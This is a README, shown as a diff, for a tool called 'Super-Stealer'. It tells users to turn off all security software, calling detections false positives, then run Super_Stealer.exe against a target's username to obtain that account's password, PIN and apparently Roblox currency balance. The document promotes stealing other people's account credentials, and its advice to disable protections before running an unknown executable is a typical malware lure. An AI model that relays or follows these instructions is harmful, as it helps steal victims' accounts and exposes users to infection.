SwaggYzzX/Super-Stealer/README.md

 How to use:
 Turn off all security as this can show as a false positive ( an entity, such as a file or a process that was detected and identified as malicious even though the entity isn't actually a threat.)
 Download the raw file
 Open the raw file
 Open Super_Stealer.exe
 Put the username of your target
+Let the stealer sit for about a minuite or two
+After that wait it will give you the username,password,pin and robux amount in the account